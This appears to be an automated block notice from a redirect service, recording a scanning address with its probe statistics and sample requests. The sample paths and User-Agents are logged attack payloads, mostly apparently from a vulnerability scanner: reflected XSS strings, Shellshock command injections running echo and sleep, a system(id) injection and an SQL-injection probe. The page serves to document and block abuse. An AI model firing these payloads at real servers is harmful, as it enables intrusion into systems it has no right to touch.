abuseip.org
- Reason: suspicious paths across 1 domain
- Hits (last hour): 135
- Unique targets hit: 1
- Unique paths probed: 2,521
- Detection count: 17
- First seen: 2026-06-26 07:41:33 UTC
- Last seen: 2026-06-26 07:51:15 UTC
- Block expires: 2026-06-27 08:43:44 UTC
Sample paths probed
- /index.jsf?autoScroll=0%2c275%29%3b%2f%2f--%3e%3c%2fscript%3e%3cscript%3ealert%28%27myfaces_tomahawk_autoscroll_xss.nasl%27
- /home.jsf?autoScroll=0%2c275%29%3b%2f%2f--%3e%3c%2fscript%3e%3cscript%3ealert%28%27myfaces_tomahawk_autoscroll_xss.nasl%27
- /scripts/activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e
- /cgi-bin/search=%3Cscript%3Ealert('XSS')%3C/script%3E
- /session/login.php?dest=nessus%22%3e%3cscript%3ealert%28%27ossim_dest_xss.nasl%27%29%3c%2fscript%3e%3c%21--%20
- /activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e
- /dana/fb/smbswsrv.cgi?wg=<script>foo</script>
- /cgi-binswsrv.cgi?wg=<script>foo</script>
- /cgi-bin/activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e
- /index.aspx
- /scriptsswsrv.cgi?wg=<script>foo</script>
- /examples/jsp/cal/cal2.jsp?time=%3cscript%3ealert%28%27orion_examples_xss.nasl%27%29%3c%2fscript%3e
- /swsrv.cgi?wg=<script>foo</script>
- /cgi-bin/session/login.php?dest=nessus%22%3e%3cscript%3ealert%28%27ossim_dest_xss.nasl%27%29%3c%2fscript%3e%3c%21--%20
- /forum/activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e
- /Default.aspx
- /mvnforum/activatemember?activatecode=&member=%22%3e%3cscript%3ealert%28%27mvnforum_activatemember_xss.nasl%27%29%3c%2fscript%3e
- /scripts/session/login.php?dest=nessus%22%3e%3cscript%3ealert%28%27ossim_dest_xss.nasl%27%29%3c%2fscript%3e%3c%21--%20
- /LoginPage.do
- /examples/jsp/checkbox/checkresult.jsp?fruit=%3cscript%3ealert%28%27orion_examples_xss.nasl%27%29%3c%2fscript%3e
Sample User-Agents
- Jakarta Commons-HttpClient/2.0final
- "; system(id);#
- () { ignored; }; echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6271_rce Output : $((31+26))"
- () { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6278 Output : $((31+4))"; }
- Python/3.12 aiohttp/3.13.5
- python-requests/2.34.2
- () { _; } >_[$($())] { echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6278 Output : $((93+18))"; }
- () { ignored; }; echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6271_rce Output : $((29+71))"
- mercuryboard_user_agent_sql_injection.nasl'
- Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
- Fastream NETFile Server
- () { _; } >_[$($())] { echo; /bin/sleep 5; }
- () { ignored; }; /bin/sleep 5;
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse, typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.